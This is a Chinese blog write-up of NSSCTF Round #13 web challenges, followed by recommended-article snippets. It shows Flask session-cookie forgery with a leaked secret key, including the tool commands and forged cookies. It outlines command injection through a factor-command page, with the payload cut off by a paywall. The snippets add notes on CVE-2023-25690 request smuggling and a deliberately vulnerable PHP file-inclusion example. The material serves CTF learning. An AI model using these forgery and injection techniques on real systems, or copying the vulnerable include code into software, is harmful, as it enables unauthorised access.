[NSSCTF Round #13]web专项赛wp

最新推荐文章于 2025-05-01 14:34:27 发布
原创 最新推荐文章于 2025-05-01 14:34:27 发布 · 1.8k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#前端 #web安全 #http

文章详细描述了几个CTF挑战中的网络安全问题,涉及Flask应用中的JWT与session伪造,利用忘密功能和secret_key解密session,实现权限提升获取flag。另外,文章还介绍了利用Linux命令进行因数爆破,通过命令注入(RCE)和ApacheHTTPServer的CVE-2023-25690漏洞进行请求走私,以及通过文件读取和HTTP走私技术获取敏感信息。

[NSSRound#13 Basic]flask?jwt?

打开环境后进入该界面

image-20230704103144187

我们自然是没有账号密码的,这里一开始尝试sql注入但是提示账号密码错误,所以换个思路。

先注册账号密码,注册成功之后先看看忘记密码功能

发现有hint,给了secretkey: th3f1askisfunny,猜测是session伪造

image-20230704103409461

然后我们用注册好的账号密码去登录

image-20230704103450090

进去后有个拿flag,但是直接点是肯定拿不到的

image-20230704104023343

既然我们已经知道secret_key了,那就去尝试session伪造,我们先得到现在的session

.eJwlzsENwzAIAMBdePcBxsY4y0QYg9Jv0ryq7t5KvQnuDXuecR2wvc47HrA_F2yAkoXJB-Kw1Lmkopm4IvVSugRJ49QSraVqQa-5qncNdS8qOZuvIFOcWCcuk2k8G9myiqMLkTdMcmyeSzpXyR7MTDZ0UlVy-EXuK87_psDnC5sILu4.ZKOIWw.RgfNfFlSxUdKucolY_51_xve0hc

我们要利用flask_session_cookie_manager3来进行session解密,payload:

python flask_session_cookie_manager3.py decode -s "th3f1askisfunny" -c ".eJwlzsENwzAIAMBdePcBxsY4y0QYg9Jv0ryq7t5KvQnuDXuecR2wvc47HrA_F2yAkoXJB-Kw1Lmkopm4IvVSugRJ49QSraVqQa-5qncNdS8qOZuvIFOcWCcuk2k8G9myiqMLkTdMcmyeSzpXyR7MTDZ0UlVy-EXuK87_psDnC5sILu4.ZKOIWw.RgfNfFlSxUdKucolY_51_xve0hc"

得到:

{
   
   '_fresh': True, '_id': '06f231c9009af8bd640aa6c80172276e1653f82e55f8820c4fd4c78e8cc286fb5cde1a80b04b0da6ba3b51ada4097611c50f1c05cfd67346f7e3331a98b1481c', '_user_id': '1'}

这里修改一下_user_id属性,猜测admin_user_id1

得到payload:

python flask_session_cookie_manager3.py encode -s "th3f1askisfunny" -t "{'_fresh': True, '_id': '06f231c9009af8bd640aa6c80172276e1653f82e55f8820c4fd4c78e8cc286fb5cde1a80b04b0da6ba3b51ada4097611c50f1c05cfd67346f7e3331a98b1481c', '_user_id': '1'}"

得到伪造好的session

.eJwlzsENwzAIAMBd_O4DbINxlokAg9Jv0ryq7t5KvQnuXfY84zrK9jrveJT9ucpWgLM29AkwNcUWd1BlF8BR6-BAppZSgyhFKnjP1X1IiHsVTiNfgSpg0A2WsmkzQl3aYQ5GdIJEB_JcPFrnHNFaQ51i2AW9_CL3Fed_g-XzBZsFLu0.ZKOJxg.SN4-0N7QVRYyRKcA3WcDrNnPeu0

然后进入到点击拿flag后的界面,把伪造好的session放进去,得到flag

[NSSRound#13 Basic]ez_factors

题目有hint:原生 Linux 因数爆破工具。flag在根目录

先用dirsearch扫一下,ok,啥也没有,换个思路

回到题目界面

image-20230704112546400

这个tool是一个超链接,点击之后跳转界面,根据题目描述,得知这里使用了factor命令对url中的数字进行因数分解

factor命令用于分解因数。factor是Ubuntu自带的分解质因数的指令

image-20230704132812969

然后我们用;进行命令拼接,来进行RCE,payload:


                

                
                
        

    



  


        

            

                      
                        最低0.47元/天 解锁文章
                          
                      
            

        


    



                



	

		

			

				
					
[NSSRound#13 Basic] 刷题记录

				
			

			

				

					rev1ve的博客
				

				

					10-21
					
					996
					
				

			

		

		

			
				
我们尝试随便修改下刚刚的session值,发现报错信息有key。那么我们随便注册一个登陆进去,想拿flag发现不是admin。回到拿flag处,bp抓包修改session值,得到flag。发现只能读出来数字,那么可以使用od命令,把它转换成八进制。发现不是admin,回到刚刚拿flag界面,发现有hint。依次找到,那么我们就可以跟着文章来,进行HTTP走私。打开题目,想注册admin发现不行(暗示很明显了)得到加密后字符串,回到拿flag页面bp抓包。提示了flag在根目录,我们尝试直接读取。

			
		

	



                

            
              



	

		

			

				
					
NSSCTF PWN方向刷题记录

				
			

			

				

					CyhStyrl的博客
				

				

					04-03
					
					990
					
				

			

		

		

			
				
流程:先添加note 0 再删除note 0 再添加note 1 并修改note1 内容为payload note1所在地址空间实则为note 0 所在位置(free后指针没有置为null 存在UAF漏洞)

			
		

	



              


  
              

                


	

		

			

				
					
Flask中的JWT

				
			

			

				

					weixin_45439324的博客
				

				

					12-03
					
					7006
					
				

			

		

		

			
				
Flask中的JWT


JWT认证
Json Web Token(JWT)
JSON Web Token(JWT)是一个非常轻巧的规范。这个规范允许我们使用JWT在两个组织之间传递安全可靠的信息。
JWT是一个有着简单的统一表达形式的字符串:

头部(Header)
头部用于描述关于该JWT的最基本的信息,例如其类型以及签名所用的算法等。 JSON内容要经Base64 编码生成字符串成为Head...

			
		

	





	

		

			

				
					
[NSSRound#13 Basic]flask?jwt?解题思路&过程

				
			

			

				

					iamblackcat's blog
				

				

					07-09
					
					2052
					
				

			

		

		

			
				
[NSSRound#13 Basic]flask?jwt?解题思路&过程

			
		

	



		

			
		



	

		

			

				
					
[NSSRound#13 Basic]flask?jwt?

				
			

			

				

					Hua_Lai_的博客
				

				

					11-05
					
					435
					
				

			

		

		

			
				
python flask_session_cookie_manager3.py decode -s “secret_key” -c “需要解密的session值”:python flask_session_cookie_manager3.py encode -s “secret_key” -t “需要加密的session值”将获得的session访问/getflag路由就可以拿到flag,我这里是用bp改的session,结果一样的。得到session,用脚本跑一下session。

			
		

	





	

		

			

				
					
Apache HTTP Server <2.4.56 mod_proxy 模块存在请求走私漏洞(CVE-2023-25690)

				
			

			

				

					murphysec的博客
				

				

					03-09
					
					2492
					
				

			

		

		

			
				
Apache HTTP Server是一款Web服务器。

该项目受影响版本存在请求走私漏洞。由于intro.xml中存在RewriteRule配置不当,当Apache启用mod_proxy且配置如 RewriteRule "^/here/(.*)" " http://example.com:8080/elsewhere?$1"; http://example.com:8080/elsewhere ; [P] ProxyPassReverse /here/ http://example.com:8080/ 

			
		

	





	

		

			

				
					
NSSCTF Round#22 Reverse个人专项 WP

				
			

			

				

					Pisces50002的博客
				

				

					04-19
					
					1316
					
				

			

		

		

			
				
是一个魔改的TEA(这里出题逻辑有问题,按给的代码逻辑SomeEncode是v加密得到的,但实际上却要我们解密得到)动调不出来(这里逻辑也莫名其妙,明明这个代码就应该能跑出flag,但实际上是要你把代码反过来写)这里是真正的提示分支,qword_7FF63596A090应当是真实的MessageBox。得到的源码并不完整,但是重要的部分已经有了,就是一个blowfish加密。VM函数抄下来符号改一下,有个地方给的代码还不对,看汇编也是sub。,这并不是字面意义的字符串,而是引用的其他文件。

			
		

	





	

		

			

				
					
[NSSCTF Round #8]——web专项wp

				
			

			

				

					Leaf_initial的博客
				

				

					07-04
					
					1274
					
				

			

		

		

			
				
根据出题人的本意是让我们上传一个包,然后去加载那个包require得到的是module.exports的内容,所以先上传一个js文件好像是没有curl这个命令,所以这里要用wget。总之,该应用程序使用 Express 框架创建了一个服务器,监听指定的端口,处理文件上传请求和污染请求,并提供静态文件服务。一开始打算用data协议,或者filter协议进行内容读取,但是好像都被ban掉了,上网查了查资料,要利用对。go语言文件上传,他说没有过滤,暂且信他一手,上网查了一下go文件上传。

			
		

	





	

		

			

				
					
nssctf-round#16web部分wp

				
			

			

				

					m0_73255659的博客
				

				

					01-26
					
					1116
					
				

			

		

		

			
				
hello ,今天带来的是最近的nssctfround#16的web wp

			
		

	





	

		

			

				
					
NSSCTF Round#17 Basic-WP——Crypto

				
			

			

				

					ASD830的博客
				

				

					02-06
					
					1152
					
				

			

		

		

			
				
Crypto(RSA)

			
		

	





	

		

			

				
					
WebNSSRound#1-20 Basic 刷题记录(全)

				
			

			

				

					uuzeray的博客
				

				

					04-11
					
					3385
					
				

			

		

		

			
				
3、之后执行content.innerHTML = data.message.content,发生报错,执行Error.prepareStackTrace,通过 callsite.getFunction()获取当前调用栈的函数,也就56-65这段的匿名函数,再callsite.getFunction()(),让这段匿名函数再次执行。1、插入了img标签,使得56-65这段匿名函数执行停止,去加载img外部引用,因为没有外部引用,所以触发img的error,执行js代码。提供应用的健康信息。

			
		

	





	

		

			

				
					
探索Apache HTTP Server的安全深渊:CVE-2023-25690的深度解读与实践

				
			

			

				

					gitblog_00039的博客
				

				

					05-28
					
					1034
					
				

			

		

		

			
				
探索Apache HTTP Server的安全深渊:CVE-2023-25690的深度解读与实践
去发现同类优质开源项目:https://gitcode.com/
在这个数字化时代,服务器安全犹如护城河般至关重要。今天,我们将深入探讨一个近期曝光的重要漏洞——CVE-2023-25690,一个影响广泛的Apache HTTP Server安全问题,它不仅考验着开发者们的智慧,也为网络安全研究者们提...

			
		

	





	

		

			

				
					
NSS LitCTF部分wp

				
			

			

				

					Welcome To My6n Blog
				

				

					05-17
					
					573
					
				

			

		

		

			
				
NSS LitCTF部分wp、MISC和WEB的简单部分

			
		

	





	

		

			

				
					
[SWPUCTF 2021 新生] (WEB二)

				
			

			

				

					2202_75317918的博客
				

				

					06-04
					
					1337
					
				

			

		

		

			
				
[SWPUCTF 2021 新生] (WEB二)

			
		

	





	

		

			

				
					
Round#13 web专项部分wp

				
			

			

				

					arcuied
				

				

					06-04
					
					651
					
				

			

		

		

			
				
Round#13 web专项部分wp

			
		

	





	

		

			

				
					
NSS [NSSRound#13 Basic]flask?jwt?

				
			

			

				

					Jay17的博客
				

				

					07-25
					
					532
					
				

			

		

		

			
				
NSS [NSSRound#13 Basic]flask?jwt?

			
		

	





	

		

			

				
					
NSSCTF Round#13 WEB

				
			

			

				

					qq_34942239的博客
				

				

					03-04
					
					527
					
				

			

		

		

			
				
在忘记密码下面有提示secretkey,那么就可以jwt伪造自己注册个账号然后登录点击拿flag提示你不是admin,并且cookie里面有个session,用工具解密一下里面有个_user_id为2,那么猜测admin为1修改成1再用工具伪造直接拿到flag。

			
		

	





	

		

			

				
					
小白个人向[NSSRound#13 Basic]flask?jwt?

				
			

			

				

					2303_77183794的博客
				

				

					06-30
					
					597
					
				

			

		

		

			
				
修改”和‘,给true首字母大写,给一些地方加上空格不然脚本会报错。成功之后,点击“拿flag”,然后替换cookie。显然是没用的功能,但是还是设计出来了,可能有提示。百度关键词 flask jwt cookie。百度关键词 flask jwt cookie。修改id为“1”,这里需要修改符号和一下细节。和我们的推断一致,盲猜第一个就是admin。获取cookie解密(注意下图的用户)拿到cookie,去替换(成功如下图)

			
		

	





	

		

			

				
					
CVE-2023-25690 漏洞复现

					
最新发布

				
			

			

				

					qq_44655084的博客
				

				

					05-01
					
					1256
					
				

			

		

		

			
				
Apache HTTP 服务器2.4.0到2.4.55版本中,当同时启用 mod_proxy 模块和某些 RewriteRule 或 ProxyPassMatch 规则时,如果这些规则使用非特定模式匹配用户提供的请求目标(URL)数据,并通过变量替换方式将这些数据重新插入到代理请求目标中,就会存在安全风险。可能引发HTTP 请求走私攻击。

			
		

	





	

		

			

				
					
NSSCTF round#28

				
			

			

				

					03-24
				

			

		

		

			
				
### 关于NSSCTF Round#28的比详情

目前尚未发现有关NSSCTF Round#28的具体官方公告或详细资料[^1]。然而,基于以往的事记录和模式分析,可以推测此轮比可能延续了之前几轮的特点,即注重实际操作能力以及对漏洞利用的深入理解。

####参与方式
通常情况下,NSSCTF系列竞会开放在线注册通道供参者报名参加。具体步骤如下:
- **访问官网**:前往NSSCTF官方网站或者其指定平台页面。
- **完成注册**:填写必要个人信息并确认提交表单。
- **获取资格**:成功登记后将收到进一步通知邮件说明后续流程安排。

对于最新一轮次(Round#28),建议密切关注主办方发布的动态更新消息渠道,例如社交媒体账号、论坛帖子或是往期选手分享的经验总结文档等资源来掌握确切日期与规则变化情况[^4]。

#### 题目解析方向预测
依据前序多场次活动案例来看,预计本轮也将围绕以下几个方面展开挑战项目设计:

1. **Web安全领域**
   - 文件上传机制缺陷检测  
     如同引用提到过的`Golang`环境下的文件处理不当实例[^3],此类场景下需仔细审查服务端验证逻辑是否存在疏漏之处允许非法脚本执行权限提升攻击行为发生。
   
2. **本地文件包含(LFI)**    
   - 探讨绕过传统防护手段方法论探讨     
     结合hxp CTF 2021中的"Includer's Revenge"难题解决方案思路启发,在不控制任何外部可控实体的前提下实现敏感数据读取目标达成目的[^2].

以下是针对上述两种典型问题类型的简单示例代码片段展示:

```python
import os
from flask import Flask, request, send_file

app = Flask(__name__)

@app.route('/upload', methods=['POST'])
def upload():
    file = request.files['file']
    filename = secure_filename(file.filename) # Ensure safe filenames are used.
    filepath = f'uploads/{filename}'
    file.save(filepath)

    if not allowed_file(filename): # Custom function to check extensions whitelist/blacklist policies etc..
        return 'Invalid File Type!', 400
    
    process_image(filepath) # Hypothetical image processing routine call here...
    return 'File uploaded successfully!'
```

以上Python程序展示了基本的文件接收存储过程需要注意的安全要点;而下面这段PHP则演示了一个简单的LFI风险示范:

```php
<?php
if(isset($_GET[&#39;page&#39;])){
    $page = $_GET[&#39;page&#39;];
}else{
    die(&#39;No page specified&#39;);
}

// No proper sanitization performed on user input leading directly into include statement below causing potential Local File Inclusion vulnerability issues.
include($page . &#39;.php&#39;); 

?>
```

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		
评论 2

	

  
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
Leafzzz__

			
你的鼓励将是我创作的最大动力

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值